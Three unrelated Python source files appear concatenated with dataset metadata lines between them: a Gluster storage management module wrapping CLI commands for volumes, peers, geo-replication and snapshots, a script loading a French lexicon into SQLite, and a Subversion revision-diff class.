raise ge.GlusterVolumeRebalanceStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def _parseVolumeRebalanceRemoveBrickStatus(xmltree, mode):
"""
returns {'hosts': [{'name': NAME,
'id': UUID_STRING,
'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING},...]
'summary': {'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING}}
"""
if mode == 'rebalance':
tree = xmltree.find('volRebalance')
elif mode == 'remove-brick':
tree = xmltree.find('volRemoveBrick')
else:
return
st = tree.find('aggregate/statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status = {
'summary': {
'runtime': tree.find('aggregate/runtime').text,
'filesScanned': tree.find('aggregate/lookups').text,
'filesMoved': tree.find('aggregate/files').text,
'filesFailed': tree.find('aggregate/failures').text,
'filesSkipped': tree.find('aggregate/skipped').text,
'totalSizeMoved': tree.find('aggregate/size').text,
'status': statusStr.upper()},
'hosts': []}
for el in tree.findall('node'):
st = el.find('statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status['hosts'].append({'name': el.find('nodeName').text,
'id': el.find('id').text,
'runtime': el.find('runtime').text,
'filesScanned': el.find('lookups').text,
'filesMoved': el.find('files').text,
'filesFailed': el.find('failures').text,
'filesSkipped': el.find('skipped').text,
'totalSizeMoved': el.find('size').text,
'status': statusStr.upper()})
return status
@gluster_mgmt_api
def volumeRebalanceStatus(volumeName):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeReplaceBrickCommitForce(volumeName, existingBrick, newBrick):
command = _getGlusterVolCmd() + ["replace-brick", volumeName,
existingBrick, newBrick, "commit",
"force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeReplaceBrickCommitForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickStart(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["start"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRemoveBrick/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStop(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["stop"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStatus(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickCommit(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["commit"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickCommitFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickForce(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def peerProbe(hostName):
command = _getGlusterPeerCmd() + ["probe", hostName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def peerDetach(hostName, force=False):
command = _getGlusterPeerCmd() + ["detach", hostName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
if e.rc == 2:
raise ge.GlusterHostNotFoundException(rc=e.rc, err=e.err)
else:
raise ge.GlusterHostRemoveFailedException(rc=e.rc, err=e.err)
def _parsePeerStatus(tree, gHostName, gUuid, gStatus):
hostList = [{'hostname': gHostName,
'uuid': gUuid,
'status': gStatus}]
for el in tree.findall('peerStatus/peer'):
if el.find('state').text != '3':
status = HostStatus.UNKNOWN
elif el.find('connected').text == '1':
status = HostStatus.CONNECTED
else:
status = HostStatus.DISCONNECTED
hostList.append({'hostname': el.find('hostname').text,
'uuid': el.find('uuid').text,
'status': status})
return hostList
@gluster_mgmt_api
def peerStatus():
"""
Returns:
[{'hostname': HOSTNAME, 'uuid': UUID, 'status': STATE}, ...]
"""
command = _getGlusterPeerCmd() + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostsListFailedException(rc=e.rc, err=e.err)
try:
return _parsePeerStatus(xmltree,
_getLocalIpAddress() or _getGlusterHostName(),
hostUUIDGet(), HostStatus.CONNECTED)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeProfileStart(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "start"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStartFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileStop(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "stop"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStopFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileInfo(volumeName, nfs=False):
"""
Returns:
When nfs=True:
{'volumeName': VOLUME-NAME,
'nfsServers': [
{'nfs': SERVER-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
When nfs=False:
{'volumeName': VOLUME-NAME,
'bricks': [
{'brick': BRICK-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
"""
command = _getGlusterVolCmd() + ["profile", volumeName, "info"]
if nfs:
command += ["nfs"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileInfoFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeProfileInfo(xmltree, nfs)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeTasks(tree):
"""
returns {TaskId: {'volumeName': VolumeName,
'taskType': TaskType,
'status': STATUS,
'bricks': BrickList}, ...}
"""
tasks = {}
for el in tree.findall('volStatus/volumes/volume'):
volumeName = el.find('volName').text
for c in el.findall('tasks/task'):
taskType = c.find('type').text
taskType = taskType.upper().replace('-', '_').replace(' ', '_')
taskId = c.find('id').text
bricks = []
if taskType == TaskType.REPLACE_BRICK:
bricks.append(c.find('params/srcBrick').text)
bricks.append(c.find('params/dstBrick').text)
elif taskType == TaskType.REMOVE_BRICK:
for b in c.findall('params/brick'):
bricks.append(b.text)
elif taskType == TaskType.REBALANCE:
pass
statusStr = c.find('statusStr').text.upper() \
.replace('-', '_') \
.replace(' ', '_')
tasks[taskId] = {'volumeName': volumeName,
'taskType': taskType,
'status': statusStr,
'bricks': bricks}
return tasks
@gluster_mgmt_api
def volumeTasks(volumeName="all"):
command = _getGlusterVolCmd() + ["status", volumeName, "tasks"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeTasksFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeTasks(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionStart(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "start"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStartFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionStop(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "stop"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStopFailedException(rc=e.rc,
err=e.err)
def _parseGeoRepStatus(tree):
"""
Returns:
{volume-name: [{sessionKey: 'key to identify the session',
remoteVolumeName: 'volume in remote gluster cluster'
bricks: [{host: 'local node',
hostUuid: 'uuid of brick host',
brickName: 'brick in the local volume',
remoteHost: 'slave',
status: 'status'
remoteUserName: 'root'
timeZone: 'nodes time zone'
crawlStatus: 'crawlStatus'
lastSynced: 'last synced time'
entry: 'nos of entry operations pending'
data: 'nos of data operations pending'
meta: 'nos of meta operations pending'
failures: 'nos of failures'
checkpointTime: 'checkpoint set time'
checkpointCompletionTime: 'checkpoint completion
time'
checkpointCompleted: 'yes/no'}]...
]....
}
"""
status = {}
for volume in tree.findall('geoRep/volume'):
sessions = []
volumeDetail = {}
for session in volume.findall('sessions/session'):
pairs = []
sessionDetail = {}
sessionDetail['sessionKey'] = session.find('session_slave').text
sessionDetail['remoteVolumeName'] = sessionDetail[
'sessionKey'].split("::")[-1].split(":")[0]
for pair in session.findall('pair'):
pairDetail = {}
pairDetail['host'] = pair.find('master_node').text
pairDetail['hostUuid'] = pair.find(
'master_node_uuid').text
pairDetail['brickName'] = pair.find('master_brick').text
pairDetail['remoteHost'] = pair.find('slave_node').text
pairDetail['remoteUserName'] = pair.find('slave_user').text
pairDetail['status'] = pair.find('status').text
pairDetail['crawlStatus'] = pair.find('crawl_status').text
pairDetail['timeZone'] = _TIME_ZONE
pairDetail['lastSynced'] = pair.find('last_synced').text
if pairDetail['lastSynced'] != 'N/A':
pairDetail['lastSynced'] = calendar.timegm(
time.strptime(pairDetail['lastSynced'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointTime'] = pair.find(
'checkpoint_time').text
if pairDetail['checkpointTime'] != 'N/A':
pairDetail['checkpointTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointCompletionTime'] = pair.find(
'checkpoint_completion_time').text
if pairDetail['checkpointCompletionTime'] != 'N/A':
pairDetail['checkpointCompletionTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointCompletionTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['entry'] = pair.find('entry').text
pairDetail['data'] = pair.find('data').text
pairDetail['meta'] = pair.find('meta').text
pairDetail['failures'] = pair.find('failures').text
pairDetail['checkpointCompleted'] = pair.find(
'checkpoint_completed').text
pairs.append(pairDetail)
sessionDetail['bricks'] = pairs
sessions.append(sessionDetail)
volumeDetail['sessions'] = sessions
status[volume.find('name').text] = volumeDetail
return status
@gluster_mgmt_api
def volumeGeoRepStatus(volumeName=None, remoteHost=None,
remoteVolumeName=None, remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd()
if volumeName:
command.append(volumeName)
if remoteHost and remoteVolumeName:
command.append("%s::%s" % (userAtHost, remoteVolumeName))
command.append("status")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepStatusFailedException(rc=e.rc, err=e.err)
try:
return _parseGeoRepStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionPause(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "pause"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionPauseFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionResume(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "resume"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionResumeFailedException(rc=e.rc,
err=e.err)
def _parseVolumeGeoRepConfig(tree):
"""
Returns:
{geoRepConfig:{'optionName': 'optionValue',...}
}
"""
conf = tree.find('geoRep/config')
config = {}
for child in conf.getchildren():
config[child.tag] = child.text
return {'geoRepConfig': config}
@gluster_mgmt_api
def volumeGeoRepConfig(volumeName, remoteHost,
remoteVolumeName, optionName=None,
optionValue=None,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "config"]
if optionName and optionValue:
command += [optionName, optionValue]
elif optionName:
command += ["!%s" % optionName]
try:
xmltree = _execGlusterXml(command)
if optionName:
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeGeoRepConfig(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotCreate(volumeName, snapName,
snapDescription=None,
force=False):
command = _getGlusterSnapshotCmd() + ["create", snapName, volumeName]
if snapDescription:
command += ['description', snapDescription]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('snapCreate/snapshot/uuid').text,
'name': xmltree.find('snapCreate/snapshot/name').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotDelete(volumeName=None, snapName=None):
command = _getGlusterSnapshotCmd() + ["delete"]
if snapName:
command.append(snapName)
elif volumeName:
command += ["volume", volumeName]
# xml output not used because of BZ:1161416 in gluster cli
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterSnapshotDeleteFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def snapshotActivate(snapName, force=False):
command = _getGlusterSnapshotCmd() + ["activate", snapName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotActivateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def snapshotDeactivate(snapName):
command = _getGlusterSnapshotCmd() + ["deactivate", snapName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotDeactivateFailedException(rc=e.rc, err=e.err)
def _parseRestoredSnapshot(tree):
"""
returns {'volumeName': 'vol1',
'volumeUuid': 'uuid',
'snapshotName': 'snap2',
'snapshotUuid': 'uuid'
}
"""
snapshotRestore = {}
snapshotRestore['volumeName'] = tree.find('snapRestore/volume/name').text
snapshotRestore['volumeUuid'] = tree.find('snapRestore/volume/uuid').text
snapshotRestore['snapshotName'] = tree.find(
'snapRestore/snapshot/name').text
snapshotRestore['snapshotUuid'] = tree.find(
'snapRestore/snapshot/uuid').text
return snapshotRestore
@gluster_mgmt_api
def snapshotRestore(snapName):
command = _getGlusterSnapshotCmd() + ["restore", snapName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotRestoreFailedException(rc=e.rc, err=e.err)
try:
return _parseRestoredSnapshot(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseSnapshotConfigList(tree):
"""
returns {'system':{'snap-max-hard-limit': 'hardlimit',
'snap-max-soft-limit': 'softLimit',
'auto-delete': 'enable/disable',
'activate-on-create': 'enable/disable'},
'volume':{'name' :
{'snap-max-hard-limit: 'hardlimit'}
}
}
"""
systemConfig = {}
systemConfig['snap-max-hard-limit'] = tree.find(
'snapConfig/systemConfig/hardLimit').text
systemConfig['snap-max-soft-limit'] = tree.find(
'snapConfig/systemConfig/softLimit').text
systemConfig['auto-delete'] = tree.find(
'snapConfig/systemConfig/autoDelete').text
systemConfig['activate-on-create'] = tree.find(
'snapConfig/systemConfig/activateOnCreate').text
volumeConfig = {}
for el in tree.findall('snapConfig/volumeConfig/volume'):
config = {}
volumeName = el.find('name').text
config['snap-max-hard-limit'] = el.find('effectiveHardLimit').text
volumeConfig[volumeName] = config
return {'system': systemConfig, 'volume': volumeConfig}
@gluster_mgmt_api
def snapshotConfig(volumeName=None, optionName=None, optionValue=None):
command = _getGlusterSnapshotCmd() + ["config"]
if volumeName:
command.append(volumeName)
if optionName and optionValue:
command += [optionName, optionValue]
try:
xmltree = _execGlusterXml(command)
if optionName and optionValue:
return
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseSnapshotConfigList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252}
}
"""
volume = {}
volumeName = tree.find(
'snapInfo/originVolume/name').text
volume[volumeName] = {
'snapRemaining': tree.find('snapInfo/originVolume/snapRemaining').text,
'snapshots': []
}
if int(tree.find('snapInfo/count').text) == 0:
return {}
for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolume'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volume[volumeName]['snapshots'].append(snapshot)
return volume
def _parseAllVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023-'
'a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 141442711}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252},
'v2': {'snapshots': [{'name': 'snap1_v2',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-1233a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1123461a6aa7'
'snapVolumeStatus': 'DEACTIVATED'}, ...],
'snapRemaining': 252},...
}
"""
volumes = {}
if int(tree.find('snapInfo/count').text) == 0:
return {}
for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolumeName'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volumeName = el.find('snapVolume/originVolume/name').text
if volumeName not in volumes:
volumes[volumeName] = {
'snapRemaining': el.find(
'snapVolume/originVolume/snapRemaining').text,
'snapshots': []
}
volumes[volumeName]['snapshots'].append(snapshot)
return volumes
@gluster_mgmt_api
def snapshotInfo(volumeName=None):
command = _getGlusterSnapshotCmd() + ["info"]
if volumeName:
command += ["volume", volumeName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotInfoFailedException(rc=e.rc, err=e.err)
try:
if volumeName:
return _parseVolumeSnapshotList(xmltree)
else:
return _parseAllVolumeSnapshotList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def executeGsecCreate():
command = _getGlusterSystemCmd() + ["execute", "gsec_create"]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepPublicKeyFileCreateFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def executeMountBrokerUserAdd(remoteUserName, remoteVolumeName):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"user", remoteUserName,
remoteVolumeName]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerUserAddFailedException(rc,
out,
err)
return True
@gluster_mgmt_api
def executeMountBrokerOpt(optionName, optionValue):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"opt", optionName,
optionValue]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerOptFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def volumeGeoRepSessionCreate(volumeName, remoteHost,
remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"create", "no-verify"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionCreateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionDelete(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"delete"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeHealInfo(volumeName=None):
command = _getGlusterVolCmd() + ["heal", volumeName, 'info']
try:
xmltree = _execGlusterXml(command)
return _parseVolumeHealInfo(xmltree)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeHealInfoFailedException(rc=e.rc, err=e.err)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeHealInfo(tree):
"""
{'bricks': [{'name': 'Fully qualified brick path',
'status': 'Connected/Not Connected'
'numberOfEntries': int,
'hostUuid': 'UUID'},...]
}
"""
healInfo = {'bricks': []}
for el in tree.findall('healInfo/bricks/brick'):
brick = {}
brick['name'] = el.find('name').text
brick['status'] = el.find('status').text
brick['hostUuid'] = el.get('hostUuid')
if brick['status'] == 'Connected':
brick['numberOfEntries'] = el.find('numberOfEntries').text
healInfo['bricks'].append(brick)
return healInfo
def exists():
try:
return os.path.exists(_glusterCommandPath.cmd)
except OSError as e:
if e.errno != os.errno.ENOENT:
raise
return False
| gpl-2.0 | -3,423,247,115,054,638,000 | 36.208461 | 79 | 0.540643 | false | 4.196308 | true | false | false |
Krolov18/Languages | Nombres/Nombres.py | 1 | 3821 | # coding: utf-8
def fonction(lex_name, number_name):
import codecs
import pickle
numbers = pickle.load(open(number_name+'.pickle', 'rb')).get('français')
with codecs.open(lex_name, 'r', 'utf-8') as f:
f.readline()
# yield tuple([x.split('_')[1] for x in f.readline().strip().split('\t')]+["isinteger", "integer"])
for line in f:
tmp1 = [(0, "")]
tmp2 = line.strip().split('\t')
if tmp2[3] == "ADJ:num" or tmp2[0] in ["million", "milliard", "zéro"]:
tmp1 = [(1, number) for number in numbers if (
(
tmp2[0] == numbers.get(number).get('graphie')
) and (
tmp2[1] == numbers.get(number).get('phonologie')
)
)]
if not tmp1:
tmp1 = [(0, "")]
yield tuple(line.split("\t"))+tmp1[0]
def main():
import sqlite3
tmp = fonction("Lexique381.txt", "exceptions")
with sqlite3.connect('Lexique.db') as conn:
cursor = conn.cursor()
cursor.execute("""CREATE TABLE Lexique (
ortho STRING,
phon STRING,
lemme STRING,
cgram STRING,
genre STRING,
nombre STRING,
freqlemfilms2 STRING,
freqlemlivres STRING,
freqfilms2 STRING,
freqlivres STRING,
infover STRNG,
nbhomogr STRING,
nbhomoph STRING,
islem STRING,
nblettres STRING,
nbphons STRING,
cvcv STRING,
p STRING,
voisorth STRING,
voisphon STRING,
puorth STRING,
puphon STRING,
syll STRING,
nbsyll STRING,
cv_cv STRING,
orthrenv STRING,
phonrenv STRING,
orthosyll STRING,
cgramortho STRING,
deflem STRING,
defobs STRING,
old20 STRING,
pld20 STRING,
morphoder STRING,
nbmorph STRING,
isinteger STRING,
integer STRING
)""")
cursor.executemany(
'''INSERT INTO Lexique VALUES (
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?)''', tmp)
conn.commit()
def main2():
import sqlite3
with sqlite3.connect("Lexique.db") as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM Lexique where ortho = ?", ("vingt",))
print(cursor.fetchone())
if __name__ == '__main__':
main2()
| apache-2.0 | -6,603,716,984,891,004,000 | 37.371134 | 107 | 0.323383 | false | 5.238683 | false | false | false |
hbussell/pinax-tracker | apps/pyvcal/subversion/revisiondiff.py | 1 | 1037 | import os
from difflib import Differ
from pprint import pprint
from subvertpy import repos, ra, NODE_DIR, NODE_FILE
class RevisionDiff(object):
""" The set of changes needed to transform one revision into another """
def __init__(self, revision1=None, revision2=None):
super(RevisionDiff, self).__init__()
self._rev1 = revision1
self._rev2 = revision2
self.ra_api = self._rev2.get_ra_api()
def get_value(self):
"""Concatenation of Unified Diffs of resources between the revisions."""
# getting the revision id of the element to be diffed.
self.rev1_num = self._rev1.properties.revision_id
self.rev2_num = self._rev2.properties.revision_id
resource1 = str(self._rev1.get_resource().data)
resource2 = str(self._rev2.get_resource().data)
differ = Differ()
result = list(differ.compare(resource1, resource2))
return ''.join(result)
value = property(get_value)
